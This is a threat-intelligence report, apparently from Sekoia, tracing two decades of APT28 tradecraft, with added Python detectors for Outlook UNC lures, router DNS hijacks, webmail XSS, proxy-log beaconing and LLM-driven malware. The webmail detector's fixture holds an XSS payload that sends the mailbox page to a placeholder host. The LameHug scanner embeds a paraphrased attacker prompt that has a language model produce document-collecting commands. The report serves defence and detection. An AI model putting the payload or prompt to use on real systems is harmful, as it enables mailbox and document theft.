APT28, an evolution of tradecraft
Source: blog.sekoia.io (Sekoia Threat Detection & Research), 2026-06-11

Context

Sekoia’s Threat Detection & Research (TDR) team has been tracking APT28 for several years. The intrusion set, also known as Fancy Bear, Forest Blizzard, Sofacy, Pawn Storm or Sednit and publicly attributed to the GRU’s Unit 26165, is one of the most prolific and persistent state-sponsored actors we monitor. Its operations span two decades and consistently target government, defence, diplomatic and critical infrastructure entities, with a focus on NATO members and Ukraine.

Given its relentless activity, this intrusion set has been extensively documented by government agencies, private cybersecurity vendors and independent researchers. The scale of this collective coverage is reflected in the list of aliases we have compiled, 33 names for one adversary:

SIG40, Pawn Storm, Tsar Team, Fancy Bear, HELLFIRE, BlueDelta, UAC-0028, STRONTIUM, Grey-Cloud, Sofacy, Group 74, Fighting Ursa, ATG2, TG-4127, IRON TWILIGHT, CrisisFour, Sednit, Forest Blizzard, ITG05, ATK5, UAC-0001, GRU Unit 26165, Swallowtail, G0007, SNAKEMACKEREL, FROZENLAKE, APT-C-20, BlueAthena, TA422, Grizzly Steppe, GruesomeLarch, Z-Lom Team.

Since 2025, we have been working with several foreign and domestic law enforcement and government agencies, including the FBI, as part of broader efforts to limit this intrusion set’s activities. Our recent publication on the infection chain of the Operation Phantom Net Voxel campaign is one example of this work. In 2026, this cooperation is part of a wider coordinated publication effort conducted alongside government agencies and private vendors, with the shared goal of constraining GRU cyber operations. The present report contributes to this collective momentum, with a different angle: it looks back at how APT28’s arsenal has evolved over time.

This report is not an exhaustive review. Our analysis is built on open source documentation. We have chosen to focus on what we consider the most significant shifts in APT28’s tradecraft, in order to understand how the intrusion-set’s arsenal has evolved from its earliest known operations to the activity we see today. We assume that a meaningful portion of APT28’s activity has never been disclosed publicly, which inevitably limits what we can analyse. We do not claim to provide a definitive analysis of the intrusion-set, and this report should be read as a modest overview rather than a comprehensive one.

That said, the open-source material available today and our TDR team’s research are sufficient to highlight several meaningful changes in APT28’s tooling, infrastructure and operational tempo.

The timeline below can be read as a sequence of operational eras, each marked by a shift in tooling, targeting or tradecraft.

Note: The dates shown here refer to the dates of the operations, not the dates of the open-source releases.

2004 – 2018: Signature implant era (X-Agent, X-Tunnel)

The historical toolkit defined the group's operational fingerprint during its highest-profile breaches: the TV5Monde sabotage, the German Bundestag hack, the 2016 US Democratic Party intrusions and the World Anti-Doping Agency leak.

2014 – 2017: Hack-and-leak playbook (fake-persona infrastructure)

APT28 pioneered the hack-and-leak playbook through the Cyber Berkut persona from March 2014, targeting Ukrainian government, NATO and German entities. It scaled the playbook up in 2016 with the breach of the Democratic Party's campaign committees and Hillary Clinton's campaign staff, releasing stolen emails through fake hacktivist identities and a third-party leak platform to maximise political damage.

2015 – 2020: Polyglot first stage (Zebrocy, medium confidence)

An operational triage layer against ministries of foreign affairs, embassies and NATO-adjacent targets across Eastern Europe and Central Asia, with the same kit rewritten in successive languages.

2019 – 2024: The Mueller fallout and the five-year blind spot (GooseEgg)

Following the massive public exposure brought by the 2019 Mueller report, APT28 went dark: public tracking and signature activity dropped sharply. The intrusion set nonetheless stayed active for about five years, silently deploying a custom privilege-escalation tool against government, NGO and transportation targets across Ukraine, Europe and North America.

2022 – 2024: Outlook zero-click

APT28 weaponised a zero-click Outlook flaw to silently leak Net-NTLMv2 hashes from NATO ministries, defence and critical-infrastructure targets, relaying them via compromised EdgeRouters to hijack Exchange mailboxes.

2022 – 2024: Shift to disposable implants (MASEPIE, STEELHOOK, OceanMap, CredoMap, HeadLace)

The toolkit was fragmented into single-purpose, short-lived components. Each implant is scoped to one task (load, steal, persist) and quickly replaced once disclosed.

2023 – 2025: Credential harvesting against civil society

A targeted credential-harvesting campaign aimed at Ukrainian civil society, the military and the energy sector. APT28 heavily spoofed the popular Ukrainian webmail portal UKR.NET, using anonymised tunnelling and custom infrastructure to evade detection.

2023 – 2025: Operation RoundPress, webmail XSS (SpyPress, medium confidence)

APT28 weaponised XSS flaws in widely deployed webmail platforms to inject SpyPress and silently exfiltrate inboxes, contacts and credentials from Ukrainian government bodies and Eastern European defence suppliers.

2023 – 2026: APT28 goes to the edge

MooBot botnet on hundreds of Ubiquiti EdgeRouters: Net-NTLMv2 collection, traffic proxying, hosting of phishing landing pages and custom Python tooling.

FrostArmada campaign on MikroTik and TP-Link routers: DHCP/DNS settings rewritten to route lookups through APT28-controlled resolvers, enabling AitM against OWA and similar services. Around 18,000 unique IPs across 120+ countries, roughly 200 organisations and 5,000 consumer devices identified.

2024 – 2026: Operation Phantom Net Voxel, custom-implant comeback (Covenant, BeardShell, Slimagent)

Long-term surveillance of Ukrainian central executive bodies and military personnel, with technical fingerprints linking the toolkit directly to the same developer team behind X-Agent and X-Tunnel.

2025: The AI integration (LameHug, medium confidence)

An LLM-integrated infostealer against Ukrainian government and defence targets, harvesting Office, PDF and TXT documents via commands generated on demand by a legitimate AI service.

Present: tracking ongoing

Two decades of APT28 tradecraft

2004 – 2018: The signature implant era and the hack-and-leak playbook

For more than a decade, APT28 ran a stable in-house implant chain across its most high-profile breaches. In parallel, the intrusion-set built the hack-and-leak playbook that would later define the 2016 US election interference, with a first iteration tested against Ukraine in 2014.

The implant chain stayed consistent during this period. Spear phishing campaigns or the SedKit exploit kit delivered the Seduploader first stage. The attackers then upgraded valuable targets to the X-Agent backdoor, often pairing it with the Sedreco loader and the X-Tunnel network pivot. ESET's 2016 paper En Route with Sednit is still the main reference for understanding this toolkit.

However, the earliest public reporting came from Trend Micro and Google. Trend Micro's 2014 Operation Pawn Storm report remains a core early reference. Google also released a key paper in 2014 and made its own attribution, linking the operation to Russian military intelligence by naming its report Peering Into Our Main Intelligence Directorate (GRU) Blind Spot.

The same arsenal turns up in the period's emblematic incidents:

  • TV5Monde in April 2015: a disruptive operation run under the fake "CyberCaliphate" persona, posing as an ISIS cyber-offensive capability, and attributed to APT28. The operation was assessed to be Russian retaliation for the cancelled delivery of two French Mistral helicopter carriers ordered by Russia in 2010, following Russia's 2014 annexation of Crimea and its involvement in the war in Donbas.
  • Bundestag in May 2015: roughly 16 GB exfiltrated, a possible Russian retaliation against Germany for leading EU sanctions over Russia's 2014 annexation of Crimea. The EU Council imposed sanctions in October 2020 on the APT28 members involved.
  • World Anti-Doping Agency in August 2016: weeks after the McLaren Report exposed Russia's state-sponsored doping programme and triggered sanctions against Russian athletes ahead of the Rio Olympics, athlete medical records were exfiltrated and leaked through a "Fancy Bears" hacktivist front, using the same in-house toolkit as the rest of the period.
  • US Democratic Party’s DCCC, DNC and Clinton campaign, March to October 2016: documented in the US DOJ Mueller indictment of 13 July 2018 and the Mueller Report of April 2019, with the implants analysed in the ESET report. The toolkit was unchanged: X-Agent for keylogging and screenshotting, X-Tunnel for exfiltration, Mimikatz for credential theft. Of note, both APT28 and APT29 (attributed to Russia’s foreign intelligence service, the SVR) were observed targeting the same organisation, which suggests executive-level tasking of priority targets.

From March 2014, the "Cyber Berkut" persona ran DDoS, doxing and document leaks against Ukrainian government, NATO and German targets, most notably the attempted sabotage of Ukraine's May 2014 presidential election. In 2018, the UK Foreign and Commonwealth Office, alongside the NCSC, listed Cyber Berkut as one of the GRU's known fronts. An analysis by Recorded Future in 2015 mapped the persona's shift from DDoS stunts to coordinated leaks of confidential Ukrainian documents. 

2015 – 2024: The Mueller fallout and the five-year blind spot

From late 2015 onwards, APT28 introduced a parallel first-stage family named Zebrocy. Its defining feature is that the same downloader and backdoor were rewritten in many languages, while keeping the same operational role and the same victims: embassies and ministries of foreign affairs across Eastern Europe and Central Asia. Attribution of Zebrocy to APT28 is assessed with medium confidence: Kaspersky treats it as a separate subgroup, while ESET integrates it into the main intrusion set. ESET documented the family in 2018, and Kaspersky covered it in its APT trends reports from 2017 to 2019. The Go variant of the backdoor was also described in a 2020 CISA Malware Analysis Report. We documented the Double-Tap campaign, which links back to older Zebrocy operations and to the cluster tracked as UAC-0063, and we attribute this activity to APT28 with medium confidence.

This era marks a major turning point for the intrusion set. In 2019, the US Department of Justice released the Mueller Report, which exposed GRU and APT28 operations. After this publication, a gap appears in the timeline. The intrusion set likely retooled to avoid the spotlight generated by the report. A second factor may also be at play: the first Trump administration's open scepticism toward the Russia attribution narrative, widely framed at the time as a Democratic effort to undermine his election, likely dampened both US intelligence focus on APT28 and the willingness of US-based security vendors to publish on the subject.

The group was nonetheless still active. In parallel, APT28 maintained a custom Windows privilege-escalation utility called GooseEgg. Microsoft Threat Intelligence disclosed it in 2024 and assessed that the tool had been in use since at least June 2020, possibly as early as April 2019. GooseEgg exploits CVE-2022-38028 in the Windows Print Spooler service to obtain SYSTEM-level execution. Targets named by Microsoft span Ukrainian, Western European and North American government, NGO, education and transportation entities. The most important takeaway is the gap: five years between operational use and public disclosure.

2022 – 2024: From monolithic implants to disposable, single-task modules

This phase marks a clear break with the X-Agent era. APT28 split its toolkit into short-lived, single-purpose components and, in parallel, weaponised a zero-click Outlook flaw to harvest Net-NTLMv2 hashes from European government and military targets.

The fragmentation is documented by CERT-UA in 2023 and by IBM X-Force (which tracks the group as ITG05) in 2024. Each new component is delivered through phishing, scoped to one task, and replaced as soon as it is burned:

  • HeadLace: multi-component backdoor (CMD/VBS/BAT).
  • CredoMap: browser credential stealer.
  • MASEPIE: Python downloader, abuses the Windows URI handler with WebDAV staging.
  • OCEANMAP: C# backdoor, described by IBM X-Force as a more capable successor of CredoMap, uses IMAP drafts for C2.
  • STEELHOOK: PowerShell script targeting Chromium-based browser data.

Each malware covers one step of the chain: loading, stealing, and persistence. Most are wiped from infrastructure within days of disclosure. Targets are predominantly Ukrainian government entities and Polish organisations.

The Outlook harvest ran in parallel. APT28 weaponised the zero-click flaw CVE-2023-23397, patched by Microsoft in March 2023 after a CERT-UA report. In-the-wild exploitation ran from April to December 2022 against European government, military, energy and transportation targets, per Microsoft MSRC.

Continued exploitation through 2023 and 2024 is reported in the 2024 joint FBI / NSA / US Cyber Command advisory. A crafted calendar item carries a UNC path as its reminder sound file (the PidLidReminderFileParameter property), so the Outlook client authenticates to an attacker-controlled SMB share as soon as the reminder fires, with no user interaction. The captured Net-NTLMv2 hashes are then relayed via compromised edge routers to harvest credentials for later reuse.
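As an added example (not Sekoia's code, nor Microsoft's mailbox-scanning script), the check below classifies the reminder sound path of a message the way a triage script for this flaw does: a plain local path is the normal case, a UNC path to an internal host is worth a look, and a UNC path to an external host (including the `\\host@80\...` WebDAV form) is the lure pattern. The message records, hostnames and internal DNS suffix are constructed placeholders; in practice the property values come from a .msg/.eml parser or a mailbox search.

```python
"""Classify the reminder sound path (PidLidReminderFileParameter) of mail items for the
CVE-2023-23397 lure pattern. Added example with constructed records."""
import ipaddress
import re
from typing import Iterable, List, Optional, Tuple

# \\host\share\file, or the WebDAV forms \\host@80\... and \\host@SSL@443\...
UNC_RE = re.compile(r"^\\\\([^\\@]+)(?:@(?:SSL@)?\d+)?\\", re.IGNORECASE)

# Assumption: DNS suffixes that identify the organisation's own file servers.
INTERNAL_SUFFIXES = (".corp.example.local",)


def _is_private_ip(host: str) -> bool:
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False


def classify_reminder_path(value: Optional[str]) -> str:
    """'none', 'local', 'internal-unc' or 'external-unc' for one reminder sound path."""
    if not value:
        return "none"
    m = UNC_RE.match(value)
    if not m:
        return "local"  # e.g. C:\Windows\Media\reminder.wav, the normal case
    host = m.group(1).strip("[]").lower()
    if host == "localhost" or _is_private_ip(host) or host.endswith(INTERNAL_SUFFIXES):
        return "internal-unc"
    return "external-unc"  # Outlook sends NTLM authentication to this host when the reminder fires


def find_suspicious(messages: Iterable[dict]) -> List[Tuple[str, str]]:
    """(subject, path) for messages whose reminder sound lives on an external host."""
    return [(m["subject"], m["reminder_file_parameter"]) for m in messages
            if classify_reminder_path(m.get("reminder_file_parameter")) == "external-unc"]


# Constructed sample: values as a .msg/.eml parser or a mailbox search would return them.
SAMPLE_MESSAGES = [
    {"subject": "Weekly sync", "reminder_file_parameter": None},
    {"subject": "Reminder", "reminder_file_parameter": r"C:\Windows\Media\reminder.wav"},
    {"subject": "Budget", "reminder_file_parameter": r"\\fs01.corp.example.local\sounds\bell.wav"},
    {"subject": "Intranet", "reminder_file_parameter": r"\\10.0.0.5\share\bell.wav"},
    {"subject": "Urgent: Contract", "reminder_file_parameter": r"\\cdn-files.example.net\pub\alert.wav"},
    {"subject": "Invoice", "reminder_file_parameter": r"\\cdn-files.example.net@80\dav\alert.wav"},
]

if __name__ == "__main__":
    for subject, path in find_suspicious(SAMPLE_MESSAGES):
        print(f"{subject!r}: {path}")
```

Note that an internal UNC path is not proof of safety: a relay point inside the network, or an internal host the attacker already controls, produces the same classification, so the `internal-unc` bucket still deserves a look. The durable fix remains the March 2023 patch plus blocking outbound SMB (TCP 445) at the perimeter, which is what stops the authentication leaving the network regardless of which message triggers it.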

2023 – 2026: Moving operational infrastructure to the edge

This is probably the most important structural shift of the recent period. APT28 systematically moved large parts of its operational infrastructure onto compromised SOHO and edge devices, rather than relying only on rented VPS. The result is a pool of attacker-controlled IPs that look like legitimate consumer traffic, hard to block and to attribute.

The MooBot campaign was the first publicly announced law enforcement disruption targeting APT28 capabilities. The FBI's Operation Dying Ember, announced by the US DOJ in 2024 and summarised in the joint advisory, dismantled a network of hundreds of Ubiquiti edge routers. The botnet was originally built by criminals using the MooBot malware; APT28 took it over from April 2022 and put it to three distinct uses:

  • Relaying the Net-NTLMv2 hashes captured through CVE-2023-23397 toward Microsoft Exchange, allowing mailbox takeover without any tooling on the victim's network.
  • Hosting phishing landing pages and credential-collection proxies on residential IPs, which sat below the radar of most reputation-based filtering.
  • Staging custom Python scripts to scrape webmail credentials from the routers themselves, keeping heavier tooling off the operator's central infrastructure.

Trend Micro's 2024 follow-up showed that more than 350 datacenter VPS were still calling back to actor infrastructure even after the takedown, highlighting how persistent this kind of botnet is once seeded.

In 2026, the FrostArmada campaign generalised the same idea to MikroTik and TP-Link routers. The campaign was disclosed by four sources within the span of a few days in April 2026.

The DNS resolvers on compromised routers were rewritten to point to APT28-controlled servers, and every downstream client inherited the setting through DHCP. Authentication traffic toward Microsoft 365 and similar services was then funnelled through Adversary-in-the-Middle nodes for credential and OAuth-token harvesting. At its peak in December 2025, Lumen observed more than 18,000 unique IPs across 120+ countries communicating with the infrastructure. Microsoft identified roughly 200 organisations and 5,000 consumer devices affected, primarily foreign ministries, law enforcement, and IT and hosting providers.
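To make the resolver hijack concrete, here is an added example (not from the page's sources) of the two checks a network team would run: parse a router export for every resolver the device uses itself or hands to clients via DHCP and diff it against an approved list, then compare what the LAN resolver returns for an authentication hostname against an out-of-band lookup. The RouterOS-style export, the approved list and all DNS answers are constructed; the addresses are documentation ranges, not real attacker or Microsoft IPs.

```python
"""Audit a router's DNS configuration and the answers its resolver hands out, the two places
a FrostArmada-style hijack shows up. Added example with constructed data."""
import re
from typing import Dict, List, Set

# Constructed RouterOS-style export (syntax modelled on `/export`; documentation addresses).
SAMPLE_EXPORT = """\
/ip dns
set allow-remote-requests=yes servers=198.51.100.53,9.9.9.9
/ip dhcp-server network
add address=192.168.88.0/24 dns-server=198.51.100.53 gateway=192.168.88.1
add address=192.168.89.0/24 dns-server=192.168.89.1 gateway=192.168.89.1
"""

# Assumption: the resolvers this network is supposed to use (the router itself plus Quad9 here).
APPROVED_RESOLVERS = {"9.9.9.9", "149.112.112.112", "192.168.88.1", "192.168.89.1"}

KV_RE = re.compile(r"\b(?:servers|dns-server)=([0-9A-Fa-f:.,]+)")


def extract_resolvers(export_text: str) -> Set[str]:
    """Every resolver the router queries itself or pushes to clients through DHCP."""
    found: Set[str] = set()
    for m in KV_RE.finditer(export_text):
        found.update(v for v in m.group(1).split(",") if v)
    return found


def unapproved_resolvers(export_text: str, approved: Set[str]) -> Set[str]:
    """Resolvers present in the config but absent from the approved list."""
    return extract_resolvers(export_text) - approved


def divergent_answers(local: Dict[str, Set[str]], trusted: Dict[str, Set[str]]) -> List[str]:
    """Names for which the LAN resolver's A records share nothing with a trusted resolver's."""
    return sorted(name for name, addrs in local.items()
                  if addrs.isdisjoint(trusted.get(name, set())))


# Constructed answers: what the LAN resolver returned versus an out-of-band lookup (for example
# DoH to a known resolver over a path that does not traverse the suspect router).
LOCAL_ANSWERS = {
    "login.microsoftonline.com": {"198.51.100.20"},
    "outlook.office.com": {"203.0.113.40"},
}
TRUSTED_ANSWERS = {
    "login.microsoftonline.com": {"203.0.113.10", "203.0.113.11"},
    "outlook.office.com": {"203.0.113.40"},
}

if __name__ == "__main__":
    print("unapproved resolvers:", unapproved_resolvers(SAMPLE_EXPORT, APPROVED_RESOLVERS))
    print("divergent answers:", divergent_answers(LOCAL_ANSWERS, TRUSTED_ANSWERS))
```

Two caveats for real use. CDN-backed services return geographically varying answers, so a disjoint set is a prompt to verify the certificate chain presented at the returned address, not proof of hijack on its own. And because the rewritten resolver reaches hosts through DHCP, the client side of the check (the resolver actually configured on laptops and phones behind the router) matters as much as the router export.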

2023 – 2025: Industrialised collection against Ukrainian civilian targets

While the edge router pivot was being built, APT28 ran a parallel collection effort aimed at Ukrainian civil society at scale. Two complementary techniques were used: client-side phishing of webmail users, and server-side exploitation of webmail platforms themselves. Phishing against UKR.NET has been documented across multiple reports:

  • CERT-UA in 2022: warned about an early variant of the campaign using fake password-change pages and Pipedream endpoints.
  • Sekoia in 2023: we documented three distinct credential-harvesting techniques active against UKR.NET at the time: a Browser-in-the-Browser lure impersonating the Centre for Defence Strategies, webhook-based exfiltration via Pipedream and Webhook.site for single-factor accounts, and a Python backdoor hosted on compromised Ubiquiti routers to bypass 2FA, automatically provision IMAP access and suppress UKR.NET security notifications.
  • Recorded Future in 2025: covers the sustained operation between June 2024 and April 2025, with at least 42 distinct credential-harvesting chains.

UKR.NET counts roughly half of the Ukrainian population among its users. Compromising accounts at scale provides asymmetric visibility into civil society, volunteer logistics and military-adjacent coordination, complementing battlefield intelligence. 

The pattern is consistent. Spear-phishing emails carry PDFs with shortened URLs. Targets click through a chain of redirections hosted on free and legitimate platforms (like Mocky), before landing on a convincing UKR.NET fake login clone. Two technical points stand out:

  • Stolen credentials are exfiltrated to free HTTP webhook services such as Pipedream and Webhook.site, used as disposable collection endpoints.
  • For 2FA-protected accounts, a Python script on a compromised Ubiquiti router validates the second factor, enables IMAP, stores the new app password and deletes the UKR.NET alert email.

Operation RoundPress takes the opposite approach. Instead of phishing users, APT28 hits the webmail servers directly. The campaign is documented by ESET in 2025 and attributed to APT28 with medium confidence, based on overlaps in sender infrastructure with previously documented campaigns. This activity has been observed since 2023 and intensified during 2024.

A spear-phishing email triggers a cross-site scripting vulnerability in the victim's webmail client. JavaScript runs in the context of the mailbox and exfiltrates contents to attacker infrastructure. The payload family is tracked as SpyPress, with one variant per webmail platform (Roundcube, Horde, MDaemon, Zimbra).

Victims include Ukrainian government bodies, defence companies in Bulgaria and Romania producing Soviet-era equipment for Ukraine, and a smaller number of government, military and academic targets in Africa, the EU and South America.
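As an added example (not ESET's or Sekoia's tooling), the scanner below walks an HTML mail body with Python's html.parser and reports the textbook active-content vectors a webmail renderer must neutralise before display: script-bearing elements, on* event handlers, javascript:/data: URLs and script inside style attributes. Both mail bodies are constructed. It is a gateway-side tripwire, not a substitute for patching: RoundPress relied on sanitiser bypasses specific to each webmail product, and a payload that slips past the product's own filter may slip past this one too.

```python
"""Flag active content in an HTML mail body that a webmail renderer must strip before display.
Added example with constructed mail bodies."""
from html.parser import HTMLParser
from typing import List, Tuple

ACTIVE_TAGS = {"script", "iframe", "object", "embed", "base", "meta", "form"}
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href", "data", "background"}


def _normalise(value: str) -> str:
    # Drop whitespace/control characters used to disguise "java\tscript:" style URLs.
    return "".join(ch for ch in value if ch.isprintable() and not ch.isspace()).lower()


class ActiveContentScanner(HTMLParser):
    """Collects (tag, reason) pairs for every element that could run script in the mailbox."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.findings: List[Tuple[str, str]] = []

    def handle_starttag(self, tag, attrs) -> None:  # also reached for self-closing tags
        if tag in ACTIVE_TAGS:
            self.findings.append((tag, "active element"))
        for name, value in attrs:  # html.parser lowercases attribute names
            val = _normalise(value or "")
            if name.startswith("on"):
                self.findings.append((tag, f"event handler {name}"))
            elif name in URL_ATTRS and val.startswith(("javascript:", "vbscript:", "data:text/html")):
                self.findings.append((tag, f"script URL in {name}"))
            elif name == "style" and ("expression(" in val or "javascript:" in val):
                self.findings.append((tag, "script in style"))


def scan_html(body: str) -> List[Tuple[str, str]]:
    scanner = ActiveContentScanner()
    scanner.feed(body)
    scanner.close()
    return scanner.findings


# Constructed phishing body: a broken image whose error handler ships the rendered mailbox DOM
# to a collection host, plus a javascript: link. Hostnames are placeholders.
MALICIOUS_SAMPLE = """<html><body>
<p>Please review the attached document.</p>
<img src="x" onerror="fetch('https://collect.example/?c='+encodeURIComponent(document.body.innerHTML))">
<a href="JavaScript:void(0)">Open</a>
</body></html>"""

# Constructed benign body: plain link and an inline (cid:) image, nothing executable.
BENIGN_SAMPLE = """<html><body><p>Hello,</p>
<a href="https://example.org/report">Report</a><img src="cid:logo"></body></html>"""

if __name__ == "__main__":
    print(scan_html(MALICIOUS_SAMPLE))
    print(scan_html(BENIGN_SAMPLE))
```

The onerror handler in the constructed sample illustrates why the mailbox context matters: script running there sees the same DOM and session the user does, so reading contacts or mail content needs no further exploit. The corresponding webmail-side control is a strict HTML sanitiser that whitelists tags and attributes rather than blacklisting the patterns above.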

2024 – 2026: The signature implant era is back

After roughly five years dominated by short-lived script-based implants, APT28's in-house development team resurfaced. Operation Phantom Net Voxel is the modern equivalent of the X-Agent / X-Tunnel stack: a tiered, modular, cloud-resident toolset built to last. Three reports anchor the analysis: CERT-UA in June 2025, Sekoia Operation Phantom Net Voxel in September 2025 and ESET Sednit Reloaded in March 2026.

Initial access is unusual. APT28 sends weaponised Office documents through private Signal Desktop chats, probably taking advantage of the fact that the client does not apply Mark-of-the-Web protection. Lures are themed around Ukrainian military administration, which points at front-line soldiers and military HR or logistics personnel.

The infection chain stages a customised Covenant framework deployment in memory. The real innovation sits on the C2 side. Instead of standard HTTP, APT28 built a custom bridge that uses the legitimate Koofr cloud service, with tasks and results travelling as encrypted files inside the operator's Koofr account.

On the highest-priority targets, APT28 escalates to BeardShell, a custom C++ backdoor that uses the Icedrive cloud API for C2. The implant is built to swap cloud providers easily, which matches what we observed in August 2025: the same chain was reused with a different lure and a switch to the legitimate Filen cloud service.

CERT-UA also reported a C++ keylogger named Slimagent on the same operator infrastructure. ESET ties Slimagent and BeardShell to direct X-Agent code lineage, with a data-collection loop nearly identical to APT28 samples observed against two European governments as far back as 2018.

The new operational baseline combines a customised in-memory Covenant deployment, a full-custom C++ escalation backdoor, a rotating set of legitimate clouds for C2, and a direct code lineage back to X-Agent.
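Two patterns from this report leave traces in ordinary web-proxy logs: the UKR.NET phishing chain above, which ends in a browser POST to a disposable webhook endpoint from a lookalike login page, and the Phantom Net Voxel C2, which polls a consumer cloud-storage API on a schedule. The added example below (not Sekoia's tooling, and not the operator's code) parses a constructed proxy log and applies both checks on top of one shared parser. The log lines are constructed, and the three cloud-storage API hostnames are assumptions for the providers named in the text.

```python
"""Triage web-proxy logs for two patterns from this report: credential POSTs to disposable
webhook endpoints behind a lookalike login page, and regular beaconing to consumer cloud
storage APIs used as a C2 relay. Constructed log and hostnames; not real traffic."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from typing import Dict, List, NamedTuple, Set, Tuple


class Rec(NamedTuple):
    ts: datetime
    src: str
    method: str
    host: str
    path: str


# Constructed proxy log: timestamp, client IP, method, host, path.
SAMPLE_LOG = """\
2025-03-04T09:00:00 10.1.1.20 GET  run.mocky.io /v3/7a1b
2025-03-04T09:00:02 10.1.1.20 GET  ukr.net-auth.example /login
2025-03-04T09:00:31 10.1.1.20 POST eo1a2b3c.m.pipedream.net /
2025-03-04T09:05:00 10.1.1.30 GET  app.koofr.net /api/v2/files/list
2025-03-04T09:06:01 10.1.1.30 GET  app.koofr.net /api/v2/files/list
2025-03-04T09:07:00 10.1.1.30 GET  app.koofr.net /api/v2/files/list
2025-03-04T09:08:02 10.1.1.30 GET  app.koofr.net /api/v2/files/list
2025-03-04T09:09:00 10.1.1.30 GET  app.koofr.net /api/v2/files/list
2025-03-04T09:05:10 10.1.1.40 GET  app.koofr.net /api/v2/files/list
2025-03-04T09:31:45 10.1.1.40 GET  app.koofr.net /api/v2/files/list
2025-03-04T10:58:03 10.1.1.40 GET  app.koofr.net /api/v2/files/list
"""

# Disposable collection endpoints named in the report, and cloud-storage API hosts
# (the three hostnames are assumptions for the providers the report names).
WEBHOOK_SUFFIXES = ("pipedream.net", "webhook.site")
CLOUD_C2_HOSTS = ("app.koofr.net", "icedrive.net", "filen.io")


def parse_log(text: str) -> List[Rec]:
    recs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, method, host, path = line.split()
        recs.append(Rec(datetime.fromisoformat(ts), src, method.upper(), host.lower(), path))
    return recs


def _matches(host: str, names: Tuple[str, ...]) -> bool:
    return any(host == n or host.endswith("." + n) for n in names)


def webhook_posts(recs: List[Rec]) -> List[Rec]:
    """Browser POSTs straight to a webhook service: the exfil hop of a credential phishing page."""
    return [r for r in recs if r.method == "POST" and _matches(r.host, WEBHOOK_SUFFIXES)]


def lookalike_hosts(recs: List[Rec], brand: str = "ukr.net") -> Set[str]:
    """Hosts that embed the brand string but are neither the brand's domain nor a subdomain of it."""
    return {r.host for r in recs if brand in r.host and not _matches(r.host, (brand,))}


def beacons(recs: List[Rec], min_hits: int = 4, max_cv: float = 0.15) -> List[Tuple[str, str, float]]:
    """(src, host, mean interval in s) for cloud-storage API traffic with near-constant spacing."""
    by_pair: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for r in recs:
        if _matches(r.host, CLOUD_C2_HOSTS):
            by_pair[(r.src, r.host)].append(r.ts)
    out = []
    for (src, host), stamps in by_pair.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:  # low jitter = scheduled polling
            out.append((src, host, avg))
    return out


if __name__ == "__main__":
    records = parse_log(SAMPLE_LOG)
    print("webhook POSTs:", [(r.src, r.host) for r in webhook_posts(records)])
    print("lookalikes:", lookalike_hosts(records))
    print("beacons:", beacons(records))
```

Staff legitimately sync files to these providers, so the beacon check is a lead to pair with process and user context (which binary opened the connection, whether a sync client is installed), not a verdict; the encrypted task files the Koofr bridge exchanges are invisible at the proxy. The webhook check is the sharper of the two: a browser session has almost no legitimate reason to POST a login form to a pipedream.net or webhook.site endpoint.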

2025 - 2026: And now, malware talks to an LLM

LameHug is the first APT28 malware observed delegating its operational logic to a large language model. The campaign was disclosed by CERT-UA in 2025, with corroborating analysis from Cato Networks CTRL. Attribution to APT28 is at medium confidence. The malware is delivered through spear-phishing against Ukrainian executive government authorities. It contains no hardcoded attacker logic. Instead, it carries base64-encoded natural-language prompts, queries Alibaba's Qwen2.5-Coder-32B-Instruct model through the Hugging Face Inference API, and runs the Windows commands the model returns. Output is collected from the Documents, Desktop and Downloads folders, then exfiltrated over SFTP or HTTP. The campaign is described as a proof of concept.
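Because the tasking lives in a prompt rather than in code, a LameHug-style sample gives itself away statically in two places: a long base64 run that decodes to English instructions, and the inference-API endpoint it will call. The added example below (not CERT-UA's or Cato's analysis code) implements that tripwire. The embedded prompt is a constructed paraphrase, not LameHug's actual text, and the Hugging Face API hostname is an assumption.

```python
"""Static tripwire for a LameHug-style sample: find base64-encoded natural-language prompts
and inference-API endpoints in a file's bytes. Added example with constructed sample bytes."""
import base64
import binascii
import re
from typing import Dict, List

B64_RE = re.compile(rb"[A-Za-z0-9+/]{48,}={0,2}")
# Hostname assumed for the Hugging Face Inference API; extend with other providers' endpoints.
API_MARKERS = (b"api-inference.huggingface.co", b"huggingface.co", b"/chat/completions")
PROMPT_WORDS = ("windows", "command", "powershell", "cmd", "folder", "collect", "documents",
                "administrator", "list")


def decode_candidates(blob: bytes) -> List[str]:
    """Decode every long base64 run that yields printable UTF-8 text."""
    out = []
    for m in B64_RE.finditer(blob):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            out.append(text)
    return out


def looks_like_prompt(text: str, min_hits: int = 3) -> bool:
    """A prompt reads as an instruction: long, spaced, and dense in sysadmin vocabulary."""
    low = text.lower()
    return len(text) >= 40 and text.count(" ") >= 6 and sum(w in low for w in PROMPT_WORDS) >= min_hits


def scan_sample(blob: bytes) -> Dict[str, List[str]]:
    return {
        "prompts": [t for t in decode_candidates(blob) if looks_like_prompt(t)],
        "api_markers": [m.decode() for m in API_MARKERS if m in blob],
    }


# Constructed sample bytes: a PE-like header, an embedded base64 prompt (paraphrased, not the
# real LameHug text), the API URL, and some binary noise that must not be flagged.
_PROMPT = ("You are a Windows system administrator. Make a list of cmd commands that collect "
           "computer information into a folder and copy Office documents from the Documents, "
           "Desktop and Downloads folders.")
SAMPLE_BLOB = (b"MZ\x90\x00\x03\x00" + b"\x00" * 16
               + base64.b64encode(_PROMPT.encode()) + b"\x00"
               + b"https://api-inference.huggingface.co/models/Qwen/Qwen2.5-Coder-32B-Instruct\x00"
               + base64.b64encode(bytes(range(256))) + b"\x00")

if __name__ == "__main__":
    print(scan_sample(SAMPLE_BLOB))
```

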